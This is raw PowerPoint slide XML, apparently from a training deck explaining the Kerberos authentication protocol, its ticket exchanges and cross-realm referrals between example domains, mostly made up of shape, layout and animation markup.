              <a:t>3. AP Exchange</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="51" name="Straight Arrow Connector 50"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3037380" y="4751748"/>
            <a:ext cx="3402980" cy="932141"/>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46" name="TextBox 45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3769925" y="5174522"/>
            <a:ext cx="1410579" cy="215444"/>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r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>2. TGS Exchange</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2121883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9"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="49"/>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fade">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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45"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>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Overview of the Kerberos Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="5309146"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Computer network authentication protocol with ‘Ticket’ exchange</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use symmetric key cryptographic technology</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(except for smart card authentication)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Master key data is not transferred on network directly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tickets do not authorize the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Developed by MIT originally</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The current major version is Kerberos v5 in 1993</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Latest Ver. by MIT: krb5-1.10.2 on 31 May 2012 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://web.mit.edu/Kerberos/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos (Cerberus)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=	a multi-headed hound which guards the gates of the Underworld</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	(Greek and Roman mythology)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="131231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Three-Realm Referral</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="1769715"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The client asks its local KDC for a ticket for the server in the “east” domain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The client receives a referral from its local KDC to the root domain. The root domain’s KDC returns a referral to the “east” KDC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Realm Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3598391" y="2531963"/>
            <a:ext cx="1771008" cy="2093536"/>
            <a:chOff x="3193452" y="1517049"/>
            <a:chExt cx="1771008" cy="2093536"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Isosceles Triangle 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3193452" y="1517049"/>
              <a:ext cx="1771008" cy="1872208"/>
            </a:xfrm>
            <a:prstGeom prst="triangle">
              <a:avLst/>
            </a:prstGeom>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wrap="none" lIns="0" tIns="1584000" rIns="0" bIns="0" rtlCol="0" anchor="b" anchorCtr="1"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="de-DE"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6562" y="2163791"/>
              <a:ext cx="584787" cy="741510"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 14"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3193452" y="3395141"/>
              <a:ext cx="1771008" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>contoso.com</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="Group 35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="683568" y="3163599"/>
            <a:ext cx="2635104" cy="3011285"/>
            <a:chOff x="683568" y="3163599"/>
            <a:chExt cx="2635104" cy="3011285"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Isosceles Triangle 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="683568" y="3163599"/>
              <a:ext cx="2635104" cy="2785681"/>
            </a:xfrm>
            <a:prstGeom prst="triangle">
              <a:avLst/>
            </a:prstGeom>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wrap="none" rtlCol="0" anchor="b" anchorCtr="1"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="de-DE"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5434" y="5335825"/>
              <a:ext cx="566691" cy="526075"/>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76887" y="4283795"/>
              <a:ext cx="567174" cy="741510"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="TextBox 15"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="683568" y="5959440"/>
              <a:ext cx="2635104" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>west.contoso.com</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="37" name="Group 36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5652120" y="3182624"/>
            <a:ext cx="2635104" cy="2994222"/>
            <a:chOff x="5652120" y="3182624"/>
            <a:chExt cx="2635104" cy="2994222"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Isosceles Triangle 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5652120" y="3182624"/>
              <a:ext cx="2635104" cy="2785681"/>
            </a:xfrm>
            <a:prstGeom prst="triangle">
              <a:avLst/>
            </a:prstGeom>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wrap="none" rtlCol="0" anchor="b" anchorCtr="1"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="de-DE" dirty="0"/>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55689" y="4069266"/>
              <a:ext cx="627966" cy="741510"/>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4288" y="5074106"/>
              <a:ext cx="499308" cy="685686"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="TextBox 21"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5652120" y="5961402"/>
              <a:ext cx="2635104" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>east.contoso.com</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Elbow Connector 22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1822939" y="5097999"/>
            <a:ext cx="548699" cy="500863"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -2078"/>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682260" y="5481315"/>
            <a:ext cx="1410579" cy="215444"/>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r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>1. TGS Exchange</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Left-Right Arrow 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20298810">
            <a:off x="2538873" y="3862624"/>
            <a:ext cx="1175719" cy="288032"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="none" tIns="216000" bIns="540000" rtlCol="0" anchor="b" anchorCtr="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Left-Right Arrow 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1304582">
            <a:off x="5253114" y="3943699"/>
            <a:ext cx="1175719" cy="288032"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="none" tIns="216000" bIns="540000" rtlCol="0" anchor="b" anchorCtr="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Straight Arrow Connector 27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2956076" y="3944955"/>
            <a:ext cx="1235425" cy="1471994"/>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29" name="Straight Arrow Connector 28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3037380" y="4619275"/>
            <a:ext cx="3402980" cy="932141"/>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34" name="TextBox 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3051117" y="4690462"/>
            <a:ext cx="1410579" cy="215444"/>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r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>2. TGS Exchange</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="TextBox 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3747485" y="5195274"/>
            <a:ext cx="1410579" cy="215444"/>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r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>3. TGS Exchange</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="38" name="Straight Arrow Connector 37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3078960" y="5520907"/>
            <a:ext cx="3855456" cy="210529"/>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41" name="TextBox 40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3803806" y="5616037"/>
            <a:ext cx="1272464" cy="215444"/>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r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>4. AP Exchange</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160962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right)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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right)">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="18" presetID="22" presetClass="entr" presetSubtype="8" fill="hold"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left)">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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34" grpId="0" animBg="1"/>
      <p:bldP spid="35" grpId="0" animBg="1"/>
      <p:bldP spid="4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Three-Realm Referral (detailed)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="677108"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To optimize the Kerberos communication shortcut trusts can be established</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Realm Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Cross-Realm Authentication: Three Domains"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1388572" y="2348880"/>
            <a:ext cx="6151106" cy="3993006"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Constructs a KRB_TGS_REP message with four items"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="312128" y="836712"/>
            <a:ext cx="2152887" cy="2729553"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="TGT for east.tailspintoys.com returned"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6444012" y="1268760"/>
            <a:ext cx="2191332" cy="2714176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Freeform 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-2307771" y="4193790"/>
            <a:ext cx="2300817" cy="2065496"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2300817"/>
              <a:gd name="connsiteY0" fmla="*/ 552381 h 2065496"/>
              <a:gd name="connsiteX1" fmla="*/ 2111828 w 2300817"/>
              <a:gd name="connsiteY1" fmla="*/ 84296 h 2065496"/>
              <a:gd name="connsiteX2" fmla="*/ 2198914 w 2300817"/>
              <a:gd name="connsiteY2" fmla="*/ 2065496 h 2065496"/>
              <a:gd name="connsiteX3" fmla="*/ 2198914 w 2300817"/>
              <a:gd name="connsiteY3" fmla="*/ 2065496 h 2065496"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2300817" h="2065496">
                <a:moveTo>
                  <a:pt x="0" y="552381"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="872671" y="192245"/>
                  <a:pt x="1745342" y="-167890"/>
                  <a:pt x="2111828" y="84296"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2478314" y="336482"/>
                  <a:pt x="2198914" y="2065496"/>
                  <a:pt x="2198914" y="2065496"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2198914" y="2065496"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:no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de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Freeform 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="971600" y="3668487"/>
            <a:ext cx="1296144" cy="1776738"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 696578 w 696578"/>
              <a:gd name="connsiteY0" fmla="*/ 1915885 h 1915885"/>
              <a:gd name="connsiteX1" fmla="*/ 32549 w 696578"/>
              <a:gd name="connsiteY1" fmla="*/ 1284514 h 1915885"/>
              <a:gd name="connsiteX2" fmla="*/ 163178 w 696578"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1915885"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="696578" h="1915885">
                <a:moveTo>
                  <a:pt x="696578" y="1915885"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="409013" y="1759856"/>
                  <a:pt x="121449" y="1603828"/>
                  <a:pt x="32549" y="1284514"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-56351" y="965200"/>
                  <a:pt x="53413" y="482600"/>
                  <a:pt x="163178" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln>
            <a:headEnd type="oval" w="lg" len="lg"/>
            <a:tailEnd type="stealth" w="lg" len="lg"/>
          </a:ln>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23" name="Freeform 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4136571" y="4077072"/>
            <a:ext cx="3459765" cy="549355"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3407229"/>
              <a:gd name="connsiteY0" fmla="*/ 827314 h 827314"/>
              <a:gd name="connsiteX1" fmla="*/ 2754086 w 3407229"/>
              <a:gd name="connsiteY1" fmla="*/ 653142 h 827314"/>
              <a:gd name="connsiteX2" fmla="*/ 3407229 w 3407229"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 827314"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
